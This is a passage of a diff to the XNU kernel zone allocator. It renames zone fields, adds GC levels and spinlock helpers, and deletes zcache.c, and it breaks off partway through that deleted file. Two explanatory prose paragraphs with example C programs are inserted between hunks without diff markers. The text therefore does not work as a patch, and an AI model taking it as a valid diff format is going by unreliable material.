 
 
@@ -6478,8 +8944,7 @@ zone_alloc_replenish_test(void)
         */
        zone_index_foreach(i) {
                z = &zone_array[i];
-               if (z->prio_refill_count &&
-                   zone_elem_size(z) >= sizeof(struct data)) {
+               if (z->z_replenishes && zone_elem_size(z) >= sizeof(struct data)) {
                        z = &zone_array[i];
                        break;
                }
index 541de3bdd3ebb75d493a4f8b6e4c17ff3a11a50c..0a6d7fb56744560d14112663601af19e38970d16 100644 (file)
@@ -425,6 +425,15 @@ extern void    *zalloc_permanent(
 #define zalloc_permanent_type(type_t) \
        ((type_t *)zalloc_permanent(sizeof(type_t), ZALIGN(type_t)))
 
+/*!
+ * @function zalloc_first_proc_made()
+ *
+ * @abstract
+ * Declare that the "early" allocation phase is done.
+ */
+extern void
+zalloc_first_proc_made(void);
+
 #pragma mark XNU only: per-cpu allocations
 
 /*!
@@ -692,6 +701,7 @@ __enum_decl(zone_reserved_id_t, zone_id_t, {
        ZONE_ID_PROC,
        ZONE_ID_VM_MAP_COPY,
        ZONE_ID_PMAP,
+       ZONE_ID_VM_MAP,
 
        ZONE_ID__FIRST_DYNAMIC,
 });
@@ -727,6 +737,7 @@ const char     *zone_heap_name(
  * @param zone          the specified zone
  * @returns             the zone (sub)map this zone allocates from.
  */
+__pure2
 extern vm_map_t zone_submap(
        zone_t                  zone);
 
@@ -813,6 +824,8 @@ extern zone_t   zone_create_ext(
  * - isn't sensitive to @c zone_t::elem_size being compromised,
  * - is slightly faster as it saves one load and a multiplication.
  *
+ * @warning: zones using foreign memory can't use this interface.
+ *
  * @param zone_id       the zone ID the address needs to belong to.
  * @param elem_size     the size of elements for this zone.
  * @param addr          the element address to check.
@@ -822,30 +835,47 @@ extern void     zone_id_require(
        vm_size_t               elem_size,
        void                   *addr);
 
+/*!
+ * @function zone_id_require_allow_foreign
+ *
+ * @abstract
+ * Requires a given pointer to belong to the specified zone, by ID and size.
+ *
+ * @discussion
+ * This is a version of @c zone_id_require() that works with zones allowing
+ * foreign memory.
+ */
+extern void     zone_id_require_allow_foreign(
+       zone_id_t               zone_id,
+       vm_size_t               elem_size,
+       void                   *addr);
+
 /*
  * Zone submap indices
  *
- * Z_SUBMAP_IDX_VA_RESTRICTED_MAP (LP64)
+ * Z_SUBMAP_IDX_VA_RESTRICTED (LP64)
  * used to restrict VM allocations lower in the kernel VA space,
  * for pointer packing
  *
- * Z_SUBMAP_IDX_GENERAL_MAP
+ * Z_SUBMAP_IDX_VA_RESERVE (ILP32)
+ * used to keep a reserve of VA space for the urgent allocations
+ * backing allocations of crucial VM types (fictitious pages, holes, ...)
+ *
+ * Z_SUBMAP_IDX_GENERAL
  * used for unrestricted allocations
  *
- * Z_SUBMAP_IDX_BAG_OF_BYTES_MAP
+ * Z_SUBMAP_IDX_BAG_OF_BYTES
  * used to sequester bags of bytes from all other allocations and allow VA reuse
  * within the map
  */
-#if !defined(__LP64__)
-#define Z_SUBMAP_IDX_GENERAL_MAP        0
-#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP   1
-#define Z_SUBMAP_IDX_COUNT              2
+#if defined(__LP64__)
+#define Z_SUBMAP_IDX_VA_RESTRICTED  0
 #else
-#define Z_SUBMAP_IDX_VA_RESTRICTED_MAP  0
-#define Z_SUBMAP_IDX_GENERAL_MAP        1
-#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP   2
-#define Z_SUBMAP_IDX_COUNT              3
+#define Z_SUBMAP_IDX_VA_RESERVE     0
 #endif
+#define Z_SUBMAP_IDX_GENERAL        1
+#define Z_SUBMAP_IDX_BAG_OF_BYTES   2
+#define Z_SUBMAP_IDX_COUNT          3
 
 /* Change zone sub-map, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_submap_idx(
@@ -855,23 +885,30 @@ extern void     zone_set_submap_idx(
 /* Make zone as non expandable, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_noexpand(
        zone_t          zone,
-       vm_size_t       maxsize);
+       vm_size_t       max_elements);
 
 /* Make zone exhaustible, to be called from the zone_create_ext() setup hook */
 extern void     zone_set_exhaustible(
        zone_t          zone,
-       vm_size_t       maxsize);
+       vm_size_t       max_elements);
 
-/* Initially fill zone with specified number of elements */
-extern int      zfill(
-       zone_t          zone,
-       int             nelem);
-
-/* Fill zone with memory */
-extern void     zcram(
+/*!
+ * @function zone_fill_initially
+ *
+ * @brief
+ * Initially fill a non-collectable zone so that it can hold the specified
+ * number of elements.
+ *
+ * @discussion
+ * This function must be called on a non-collectable permanent zone before it
+ * has ever been used.
+ *
+ * @param zone          The zone to fill.
+ * @param nelems        The number of elements to be able to hold.
+ */
+extern void     zone_fill_initially(
        zone_t          zone,
-       vm_offset_t     newmem,
-       vm_size_t       size);
+       vm_size_t       nelems);
 
 #pragma mark XNU only: misc & implementation details
 
@@ -940,6 +977,26 @@ extern void zone_view_startup_init(
 #define __zpcpu_cast(ptr, e)    ((typeof(ptr))(e))
 #define __zpcpu_next(ptr)       __zpcpu_cast(ptr, __zpcpu_addr(ptr) + PAGE_SIZE)
 
+/**
+ * @macro __zpcpu_mangle_for_boot()
+ *
+ * @discussion
+ * Per-cpu variables allocated in zones (as opposed to percpu globals) that need
+ * to function early during boot (before @c STARTUP_SUB_ZALLOC) might use static
+ * storage marked @c __startup_data and replace it with the proper allocation
+ * at the end of the @c STARTUP_SUB_ZALLOC phase (@c STARTUP_RANK_LAST).
+ *
+ * However, some devices boot from a cpu where @c cpu_number() != 0. This macro
+ * provides the proper mangling of the storage into a "fake" percpu pointer so
+ * that accesses through @c zpercpu_get() functions properly.
+ *
+ * Using this macro after the @c STARTUP_SUB_ZALLOC phase has completed is invalid.
+ */
+#define __zpcpu_mangle_for_boot(ptr)  ({ \
+       assert(startup_phase < STARTUP_SUB_ZALLOC); \
+       __zpcpu_cast(ptr, __zpcpu_mangle(__zpcpu_addr(ptr) - ptoa(cpu_number()))); \
+})
+
 extern unsigned zpercpu_count(void) __pure2;
 
 
index 9fff604294ac05f5bfff961ab69dc6efa9aba8bd..366ce538e1aed38534e541787765be7f12f2d1c1 100644 (file)
 #include <kern/locks.h>
 #include <kern/btlog.h>
 #include <kern/simple_lock.h>
-#include <kern/zcache_internal.h>
 
 #include <os/atomic_private.h>
+#include <sys/queue.h>
 
 #if KASAN
-#include <sys/queue.h>
 #include <san/kasan.h>
-/*
- * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan.
- * Otherwise they are double-duty with what kasan already does.
- */
-#define ZALLOC_ENABLE_POISONING 0
-#else /* !KASAN */
-#define ZALLOC_ENABLE_POISONING 1
+#include <kern/spl.h>
 #endif /* !KASAN */
 
-#if DEBUG || DEVELOPMENT
-#define ZALLOC_DETAILED_STATS  1
-#else
-#define ZALLOC_DETAILED_STATS  0
-#endif
-
 /*!
  * @file <kern/zalloc_internal.h>
  *
@@ -140,11 +127,12 @@ typedef struct zone_packed_virtual_address {
 struct zone_stats {
        uint64_t            zs_mem_allocated;
        uint64_t            zs_mem_freed;
-#if ZALLOC_DETAILED_STATS
-       uint64_t            zs_mem_wasted;
-#endif /* ZALLOC_DETAILED_STATS */
+       uint32_t            zs_poison_seqno; /* counter for poisoning every N frees */
+       uint32_t            zs_alloc_rr;     /* allocation rr bias */
 };
 
+STAILQ_HEAD(zone_depot, zone_magazine);
+
 struct zone {
        /*
         * Readonly / rarely written fields
@@ -160,52 +148,47 @@ struct zone {
        zone_stats_t        z_stats;
        const char         *z_name;
        struct zone_view   *z_views;
-#ifdef CONFIG_ZCACHE
-       struct zone_cache   zcache;
-#endif  /* CONFIG_ZCACHE */
 
-       uint16_t            alloc_pages;    /* size used for more memory in pages */
-       uint16_t            z_elem_size;    /* size of an element */
-       uint16_t            pcpu_elem_size;
-       uint16_t            prio_refill_count; /* if !=0 , refill to this count */
-       uint32_t            page_count_max; /* how large can this zone grow */
+       struct thread      *z_expander;
+       struct zone_cache  *__zpercpu z_pcpu_cache;
 
-       uint32_t            page_count_hwm; /* page_count high watermark */
-       uint32_t            page_count;     /* number of pages used by this zone */
-       uint32_t            countavail;     /* Number of elements available */
+       uint16_t            z_chunk_pages;  /* size used for more memory in pages  */
+       uint16_t            z_chunk_elems;  /* count of allocations per chunk */
+       uint16_t            z_elems_rsv;    /* maintain a free reserve of elements */
+       uint16_t            z_elem_size;    /* size of an element                  */
 
        uint64_t
        /*
         * Lifecycle state (Mutable after creation)
         */
-           destroyed          :1,  /* zone is (being) destroyed */
-           expanding_no_vm_priv:1, /* zone expanding via a non-vm_privileged thread */
-           expanding_vm_priv  :1,  /* zone expanding via a vm_privileged thread */
-           async_pending      :1,  /* asynchronous allocation pending? */
-           waiting            :1,  /* is thread waiting for expansion? */
-           zone_replenishing  :1,
+           z_destroyed        :1,  /* zone is (being) destroyed */
+           z_async_refilling  :1,  /* asynchronous allocation pending? */
+           z_replenish_wait   :1,  /* someone is waiting on the replenish thread */
+           z_expanding_wait   :1,  /* is thread waiting for expansion? */
+           z_expander_vm_priv :1,  /* a vm privileged thread is expanding */
 
        /*
         * Security sensitive configuration bits
         */
-           allows_foreign     :1,  /* allow non-zalloc space  */
-           destructible       :1,  /* zone can be zdestroy()ed  */
+           z_allows_foreign   :1,  /* allow non-zalloc space  */
+           z_destructible     :1,  /* zone can be zdestroy()ed  */
            kalloc_heap        :2,  /* zone_kheap_id_t when part of a kalloc heap */
-           noencrypt          :1,  /* do not encrypt pages when hibernating */
-           submap_idx         :2,  /* a Z_SUBMAP_IDX_* value */
-           va_sequester       :1,  /* page sequester: no VA reuse with other zones */
-           zfree_clear_mem    :1,  /* clear memory of elements on free and assert on alloc */
+           z_noencrypt        :1,  /* do not encrypt pages when hibernating */
+           z_submap_idx       :2,  /* a Z_SUBMAP_IDX_* value */
+           z_va_sequester     :1,  /* page sequester: no VA reuse with other zones */
+           z_free_zeroes      :1,  /* clear memory of elements on free and assert on alloc */
 
        /*
         * Behavior configuration bits
         */
+           z_percpu           :1,  /* the zone is percpu */
+           z_permanent        :1,  /* the zone allocations are permanent */
+           z_replenishes      :1,  /* uses the async replenish mechanism for VM */
+           z_nocaching        :1,  /* disallow zone caching for this zone */
            collectable        :1,  /* garbage collect empty pages */
-           cpu_cache_enabled  :1,
-           permanent          :1,  /* the zone allocations are permanent */
            exhaustible        :1,  /* merely return if empty? */
            expandable         :1,  /* expand zone (with message)? */
            no_callout         :1,
-           percpu             :1,  /* the zone is percpu */
 
            _reserved          :26,
 
@@ -227,7 +210,20 @@ struct zone {
         * often mutated fields
         */
 
-       decl_simple_lock_data(, lock);
+       lck_spin_t          z_lock;
+       struct zone_depot   z_recirc;
+
+       /*
+        * Page accounting (wired / VA)
+        *
+        * Those numbers are unscaled for z_percpu zones
+        * (zone_scale_for_percpu() needs to be used to find the true value).
+        */
+       uint32_t            z_wired_max;    /* how large can this zone grow        */
+       uint32_t            z_wired_hwm;    /* z_wired_cur high watermark          */
+       uint32_t            z_wired_cur;    /* number of pages used by this zone   */
+       uint32_t            z_wired_empty;  /* pages collectable by GC             */
+       uint32_t            z_va_cur;       /* amount of VA used by this zone      */
 
        /*
         * list of metadata structs, which maintain per-page free element lists
@@ -235,17 +231,48 @@ struct zone {
         * Note: Due to the index packing in page metadata,
         *       these pointers can't be at the beginning of the zone struct.
         */
-       zone_pva_t          pages_any_free_foreign;     /* foreign pages crammed into zone */
-       zone_pva_t          pages_all_used_foreign;
-       zone_pva_t          pages_all_free;
-       zone_pva_t          pages_intermediate;
-       zone_pva_t          pages_all_used;
-       zone_pva_t          pages_sequester;            /* sequestered pages - allocated VA with no populated pages */
-
-       uint32_t            zp_count;                   /* counter for poisoning every N frees */
-       uint32_t            countfree;                  /* Number of free elements */
-       uint32_t            allfree_page_count;         /* Number of pages collectable by GC */
-       uint32_t            sequester_page_count;
+       zone_pva_t          z_pageq_empty;  /* populated, completely empty pages   */
+       zone_pva_t          z_pageq_partial;/* populated, partially filled pages   */
+       zone_pva_t          z_pageq_full;   /* populated, completely full pages    */
+       zone_pva_t          z_pageq_va;     /* non-populated VA pages              */
+
+       /*
+        * Zone statistics
+        *
+        * z_contention_wma:
+        *   weighted moving average of the number of contentions per second,
+        *   in Z_CONTENTION_WMA_UNIT units (fixed point decimal).
+        *
+        * z_contention_cur:
+        *   count of recorded contentions that will be fused in z_contention_wma
+        *   at the next period.
+        *
+        * z_recirc_cur:
+        *   number of magazines in the recirculation depot.
+        *
+        * z_elems_free:
+        *   number of free elements in the zone.
+        *
+        * z_elems_{min,max}:
+        *   tracks the low/high watermark of z_elems_free for the current
+        *   weighted moving average period.
+        *
+        * z_elems_free_wss:
+        *   weighted moving average of the (z_elems_free_max - z_elems_free_min)
+        *   amplitude, which is used by the GC for trim operations.
+        *
+        * z_elems_avail:
+        *   total number of elements in the zone, free or allocated.
+        */
+#define Z_CONTENTION_WMA_UNIT (1u << 8)
+       uint32_t            z_contention_wma;
+       uint32_t            z_contention_cur;
+       uint32_t            z_recirc_cur;
+       uint32_t            z_elems_free_max;
+       uint32_t            z_elems_free_wss;
+       uint32_t            z_elems_free_min;
+       uint32_t            z_elems_free;   /* Number of free elements             */
+       uint32_t            z_elems_avail;  /* Number of elements available        */
 
 #if CONFIG_ZLEAKS
        uint32_t            zleak_capture;  /* per-zone counter for capturing every N allocations */
@@ -254,7 +281,8 @@ struct zone {
        gzalloc_data_t      gz;
 #endif
 #if KASAN_ZALLOC
-       vm_size_t           kasan_redzone;
+       uint32_t            z_kasan_redzone;
+       spl_t               z_kasan_spl;
 #endif
 #if DEBUG || DEVELOPMENT || CONFIG_ZLEAKS
        /* zone logging structure to hold stacks and element references to those stacks. */
@@ -300,16 +328,33 @@ struct kheap_zones {
 };
 
 extern zone_security_options_t zsecurity_options;
-extern uint32_t _Atomic        num_zones;
+extern zone_id_t _Atomic       num_zones;
 extern uint32_t                zone_view_count;
 extern struct zone             zone_array[];
-extern lck_grp_t               zone_locks_grp;
 extern const char * const      kalloc_heap_names[KHEAP_ID_COUNT];
+extern bool                    panic_include_zprint;
+#if CONFIG_ZLEAKS
+extern bool                    panic_include_ztrace;
+extern struct ztrace          *top_ztrace;
+#endif
+extern mach_memory_info_t     *panic_kext_memory_info;
+extern vm_size_t               panic_kext_memory_size;
+extern unsigned int            zone_map_jetsam_limit;
 
 #define zone_index_foreach(i) \
-       for (uint32_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \
+       for (zone_id_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \
            i < num_zones_##i; i++)
 
+#define zone_foreach(z) \
+       for (zone_t z = &zone_array[1], \
+           last_zone_##z = &zone_array[os_atomic_load(&num_zones, acquire)]; \
+           z < last_zone_##z; z++)
+
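zone_index_foreach() and zone_foreach() snapshot the zone count once, in a loop-scoped variable built with token pasting, so a concurrently growing num_zones cannot move the bound mid-iteration. A small user-space sketch of the same shape, using hypothetical ex_* names and plain C11 atomics in place of the os_atomic wrappers:

#include <stdatomic.h>
#include <stdio.h>

static _Atomic unsigned ex_num_items = 5;

/* Snapshot the atomic bound once, in a loop-scoped variable named via ## pasting. */
#define ex_item_foreach(i) \
        for (unsigned i = 1, ex_bound_##i = atomic_load_explicit(&ex_num_items, memory_order_acquire); \
            i < ex_bound_##i; i++)

int main(void)
{
        ex_item_foreach(idx) {
                printf("item %u\n", idx);
        }
        return 0;
}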
+struct zone_map_range {
+       vm_offset_t min_address;
+       vm_offset_t max_address;
+} __attribute__((aligned(2 * sizeof(vm_offset_t))));
+
 __pure2
 static inline vm_offset_t
 zone_elem_size(zone_t zone)
@@ -320,7 +365,16 @@ zone_elem_size(zone_t zone)
 static inline uint32_t
 zone_count_allocated(zone_t zone)
 {
-       return zone->countavail - zone->countfree;
+       return zone->z_elems_avail - zone->z_elems_free;
+}
+
+static inline vm_size_t
+zone_scale_for_percpu(zone_t zone, vm_size_t size)
+{
+       if (zone->z_percpu) {
+               size *= zpercpu_count();
+       }
+       return size;
 }
 
 static inline vm_size_t
@@ -330,26 +384,29 @@ zone_size_wired(zone_t zone)
         * this either require the zone lock,
         * or to be used for statistics purposes only.
         */
-       return ptoa(os_atomic_load(&zone->page_count, relaxed));
+       vm_size_t size = ptoa(os_atomic_load(&zone->z_wired_cur, relaxed));
+       return zone_scale_for_percpu(zone, size);
 }
 
 static inline vm_size_t
 zone_size_free(zone_t zone)
 {
-       return (vm_size_t)zone->pcpu_elem_size * zone->countfree;
+       return zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone->z_elems_free);
 }
 
 static inline vm_size_t
 zone_size_allocated(zone_t zone)
 {
-       return (vm_size_t)zone->pcpu_elem_size * zone_count_allocated(zone);
+       return zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone_count_allocated(zone));
 }
 
 static inline vm_size_t
 zone_size_wasted(zone_t zone)
 {
-       return zone_size_wired(zone) -
-              (vm_size_t)zone->pcpu_elem_size * zone->countavail;
+       return zone_size_wired(zone) - zone_scale_for_percpu(zone,
+                  (vm_size_t)zone->z_elem_size * zone->z_elems_avail);
 }
 
 /*
@@ -359,15 +416,61 @@ zone_size_wasted(zone_t zone)
  */
 extern uint64_t get_zones_collectable_bytes(void);
 
-/*
- * zone_gc also checks if the zone maps are getting close to full and triggers
- * jetsams if needed, provided consider_jetsams is set to TRUE.
+/*!
+ * @enum zone_gc_level_t
+ *
+ * @const ZONE_GC_TRIM
+ * Request a trimming GC: it will trim allocations in excess
+ * of the working set size estimate only.
+ *
+ * @const ZONE_GC_DRAIN
+ * Request a draining GC: this is an aggressive mode that will
+ * cause all caches to be drained and all free pages returned to the system.
+ *
+ * @const ZONE_GC_JETSAM
+ * Request to consider a jetsam, and then fall back to @c ZONE_GC_TRIM or
+ * @c ZONE_GC_DRAIN depending on the state of the zone map.
+ * To avoid deadlocks, only @c vm_pageout_garbage_collect() should ever
+ * request a @c ZONE_GC_JETSAM level.
+ */
+__enum_closed_decl(zone_gc_level_t, uint32_t, {
+       ZONE_GC_TRIM,
+       ZONE_GC_DRAIN,
+       ZONE_GC_JETSAM,
+});
+
+/*!
+ * @function zone_gc
+ *
+ * @brief
+ * Reduces memory used by zones by trimming caches and freelists.
  *
- * To avoid deadlocks, we only pass a value of TRUE from within the
- * vm_pageout_garbage_collect thread.
+ * @discussion
+ * @c zone_gc() is called:
+ * - by the pageout daemon when the system needs more free pages.
+ * - by the VM when contiguous page allocation requests get stuck
+ *   (see vm_page_find_contiguous()).
+ *
+ * @param level         The zone GC level requested.
+ */
+extern void     zone_gc(zone_gc_level_t level);
+
+extern void     zone_gc_trim(void);
+extern void     zone_gc_drain(void);
+
+#define ZONE_WSS_UPDATE_PERIOD  10
+/*!
+ * @function compute_zone_working_set_size
+ *
+ * @brief
+ * Recomputes the working set size for every zone
+ *
+ * @discussion
+ * This runs about every @c ZONE_WSS_UPDATE_PERIOD seconds (10),
+ * computing an exponential moving average with a weight of 75%,
+ * so that the history of the last minute is the dominating factor.
  */
-extern void     zone_gc(boolean_t consider_jetsams);
-extern void     consider_zone_gc(boolean_t consider_jetsams);
+extern void     compute_zone_working_set_size(void *);
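compute_zone_working_set_size() is described above as a 75%-weighted exponential moving average refreshed every ZONE_WSS_UPDATE_PERIOD (10) seconds. A small sketch of what such an update could look like, assuming the 75% weight applies to the previous estimate (hypothetical user-space code, not the kernel's actual fixed-point arithmetic):

#include <stdio.h>
#include <stdint.h>

/* Hypothetical EMA update: keep 75% of the old estimate, blend in the new sample. */
static uint32_t
ex_wss_update(uint32_t old_wss, uint32_t amplitude)
{
        return (3 * old_wss + amplitude) / 4;
}

int main(void)
{
        uint32_t wss = 0;
        uint32_t samples[] = { 400, 380, 20, 10, 15, 12 };     /* free-count amplitudes */

        for (unsigned i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
                wss = ex_wss_update(wss, samples[i]);
                printf("period %u: wss=%u\n", i, wss);
        }
        return 0;
}

With a 3/4 retention factor and 10-second periods, samples older than a minute contribute less than 20% of the estimate, which matches the "history of the last minute is the dominating factor" description.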
 
 /* Debug logging for zone-map-exhaustion jetsams. */
 extern void     get_zone_map_size(uint64_t *current_size, uint64_t *capacity);
@@ -376,17 +479,25 @@ extern void     get_largest_zone_info(char *zone_name, size_t zone_name_len, uin
 /* Bootstrap zone module (create zone zone) */
 extern void     zone_bootstrap(void);
 
-/*
+/*!
+ * @function zone_foreign_mem_init
+ *
+ * @brief
  * Steal memory from pmap (prior to initialization of zalloc)
  * for the special vm zones that allow foreign memory and store
- * the range so as to facilitate range checking in zfree/zcram.
+ * the range so as to facilitate range checking in zfree.
  */
 __startup_func
-extern vm_offset_t zone_foreign_mem_init(vm_size_t size);
+extern vm_offset_t zone_foreign_mem_init(
+       vm_size_t       size);
 
-/*
- * Returns size (greater than min_pages) that is a multiple
- * of the allocation granule for the zone.
+/*!
+ * @function zone_get_foreign_alloc_size
+ *
+ * @brief
+ * Compute the correct size (greater than @c ptoa(min_pages)) that is a multiple
+ * of the allocation granule for the zone with the given creation flags and
+ * element size.
  */
 __startup_func
 extern vm_size_t zone_get_foreign_alloc_size(
@@ -395,6 +506,22 @@ extern vm_size_t zone_get_foreign_alloc_size(
        zone_create_flags_t  flags,
        uint16_t             min_pages);
 
+/*!
+ * @function zone_cram_foreign
+ *
+ * @brief
+ * Cram memory allocated with @c zone_foreign_mem_init() into a zone.
+ *
+ * @param zone          The zone to cram memory into.
+ * @param newmem        The base address for the memory to cram.
+ * @param size          The size of the memory to cram into the zone.
+ */
+__startup_func
+extern void     zone_cram_foreign(
+       zone_t          zone,
+       vm_offset_t     newmem,
+       vm_size_t       size);
+
 extern bool     zone_maps_owned(
        vm_address_t    addr,
        vm_size_t       size);
@@ -404,8 +531,8 @@ extern void     zone_map_sizes(
        vm_map_size_t  *pfree,
        vm_map_size_t  *plargest_free);
 
-extern boolean_t
-is_zone_map_nearing_exhaustion(void);
+extern bool
+zone_map_nearing_exhaustion(void);
 
 #if defined(__LP64__)
 #define ZONE_POISON       0xdeadbeefdeadbeef
@@ -413,12 +540,6 @@ is_zone_map_nearing_exhaustion(void);
 #define ZONE_POISON       0xdeadbeef
 #endif
 
-/*
- * Used by zalloc_direct_locked() and zcache to mark elements that have been
- * cleared or poisoned and need to be checked.
- */
-#define ZALLOC_ELEMENT_NEEDS_VALIDATION ((vm_offset_t)1)
-
 static inline vm_tag_t
 zalloc_flags_get_tag(zalloc_flags_t flags)
 {
@@ -428,54 +549,23 @@ zalloc_flags_get_tag(zalloc_flags_t flags)
 extern void    *zalloc_ext(
        zone_t          zone,
        zone_stats_t    zstats,
-       zalloc_flags_t  flags,
-       vm_size_t       wasted);
+       zalloc_flags_t  flags);
 
 extern void     zfree_ext(
        zone_t          zone,
        zone_stats_t    zstats,
        void           *addr);
 
-/* free an element with no regard for gzalloc, zleaks, or kasan*/
-extern void     zfree_direct_locked(
-       zone_t          zone,
-       vm_offset_t     elem,
-       bool            poison);
-
-/*
- * attempts to allocate an element with no regard for gzalloc, zleaks, or kasan
- * returns an address possibly tagged with ZALLOC_ELEMENT_NEEDS_VALIDATION.
+/*!
+ * @function zone_replenish_configure
+ *
+ * @brief
+ * Used by zones backing the VM to maintain a reserve of free elements.
+ *
+ * @discussion
+ * This function should not be used by anyone else than the VM.
  */
-extern vm_offset_t zalloc_direct_locked(
-       zone_t          zone,
-       zalloc_flags_t  flags,
-       vm_size_t       waste);
-
-extern uint32_t zone_poison_count_init(
-       zone_t          zone);
-
-extern bool     zfree_clear_or_poison(
-       zone_t          zone,
-       uint32_t       *zp_count,
-       vm_address_t    addr);
-
-extern void     zone_clear_freelist_pointers(
-       zone_t          zone,
-       vm_offset_t     addr);
-
-#if ZALLOC_ENABLE_POISONING
-extern void     zalloc_validate_element(
-       zone_t          zone,
-       vm_offset_t     addr,
-       vm_size_t       size,
-       bool            validate);
-#endif
-
-extern void     zone_allocated_element_validate(
-       zone_t          zone,
-       vm_offset_t     addr);
-
-extern void     zone_prio_refill_configure(
+extern void     zone_replenish_configure(
        zone_t          zone);
 
 extern vm_size_t zone_element_size(
@@ -526,8 +616,35 @@ extern uint32_t zone_index_from_tag_index(
 
 #endif /* VM_MAX_TAG_ZONES */
 
-#define lock_zone(zone)   simple_lock(&(zone)->lock, &zone_locks_grp)
-#define unlock_zone(zone) simple_unlock(&(zone)->lock)
+static inline void
+zone_lock(zone_t zone)
+{
+#if KASAN_ZALLOC
+       spl_t s = 0;
+       if (zone->kasan_fakestacks) {
+               s = splsched();
+       }
+#endif /* KASAN_ZALLOC */
+       lck_spin_lock(&zone->z_lock);
+#if KASAN_ZALLOC
+       zone->z_kasan_spl = s;
+#endif /* KASAN_ZALLOC */
+}
+
+static inline void
+zone_unlock(zone_t zone)
+{
+#if KASAN_ZALLOC
+       spl_t s = zone->z_kasan_spl;
+       zone->z_kasan_spl = 0;
+#endif /* KASAN_ZALLOC */
+       lck_spin_unlock(&zone->z_lock);
+#if KASAN_ZALLOC
+       if (zone->kasan_fakestacks) {
+               splx(s);
+       }
+#endif /* KASAN_ZALLOC */
+}
 
 #if CONFIG_GZALLOC
 void gzalloc_init(vm_size_t);
diff --git a/osfmk/kern/zcache.c b/osfmk/kern/zcache.c
deleted file mode 100644 (file)
index f088999..0000000
+++ /dev/null
@@ -1,698 +0,0 @@
-/*
- * Copyright (c) 2017-2020 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-
-#include <kern/assert.h>
-#include <kern/cpu_data.h>
-#include <mach/mach_host.h>
-#include <vm/vm_kern.h>
-#include <kern/startup.h>
-#include <kern/zalloc_internal.h>
-
-/* Size of array in magazine determined by boot-arg or default */
-TUNABLE(uint16_t, magazine_element_count, "zcc_magazine_element_count", 8);
-
-/* Size of depot lists determined by boot-arg or default */
-TUNABLE(uint16_t, depot_element_count, "zcc_depot_element_count", 8);
-
-SECURITY_READ_ONLY_LATE(zone_t)    magazine_zone;       /* zone to allocate zcc_magazine structs from */
-SECURITY_READ_ONLY_LATE(uintptr_t) zcache_canary;       /* Canary used for the caching layer to prevent UaF attacks */
-
-/*
- *     The zcc_magazine is used as a stack to store cached zone elements. These
- *     sets of elements can be moved around to perform bulk operations.
- */
-struct zcc_magazine {
-       uint32_t zcc_magazine_index;            /* Used as a stack pointer to acess elements in the array */
-       uint32_t zcc_magazine_capacity;         /* Number of pointers able to be stored in the zcc_elements array */
-       vm_offset_t zcc_elements[0];            /* Array of pointers to objects */
-};
-
-
-/*
- * Each CPU will use one of these to store its elements
- */
-struct zcc_per_cpu_cache {
-       /* Magazine we always try to allocate from and free to first */
-       struct zcc_magazine *current;
-       /* Dedicated magazine for a quick reload and to prevent thrashing when we swap with the depot */
-       struct zcc_magazine *previous;
-       /* Zcache poisoning count */
-       uint32_t zp_count;
-#if ZALLOC_DETAILED_STATS
-       uint64_t zcc_allocs;
-       uint64_t zcc_frees;
-#endif /* ZALLOC_DETAILED_STATS */
-};
-
-
-/*     This is the basic struct that takes care of caching and is included within
- *      the zone.
- */
-struct zcc_depot {
-       /* marks the point in the array where empty magazines begin */
-       int zcc_depot_index;
-
-#if ZALLOC_DETAILED_STATS
-       uint64_t zcc_swap;
-       uint64_t zcc_fill;
-       uint64_t zcc_drain;
-       uint64_t zcc_fail;
-       uint64_t zcc_gc;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       /* Stores full and empty magazines in the depot layer */
-       struct zcc_magazine *zcc_depot_list[0];
-};
-
-static bool zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag);
-static void zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag);
-static bool zcache_mag_has_space(struct zcc_magazine *mag);
-static bool zcache_mag_has_elements(struct zcc_magazine *mag);
-static void zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b);
-static void zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache);
-static void zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache);
-static void zcache_canary_add(zone_t zone, vm_offset_t addr);
-#if ZALLOC_ENABLE_POISONING
-static void zcache_validate_element(zone_t zone, vm_offset_t *addr, bool poison);
-static void zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup);
-#endif
-
-/*
- * zcache_ready
- *
- * Returns whether or not the zone caches are ready to use
- *
- */
-static bool
-zcache_ready(void)
-{
-       return magazine_zone != NULL;
-}
-
-/*
- * zcache_bootstrap
- *
- * Initializes zone to allocate magazines from and sets
- * magazine_element_count and depot_element_count from
- * boot-args or default values
- *
- */
-__startup_func
-static void
-zcache_bootstrap(void)
-{
-       int magazine_size = sizeof(struct zcc_magazine) + magazine_element_count * sizeof(void *);
-       zone_t magzone;
-
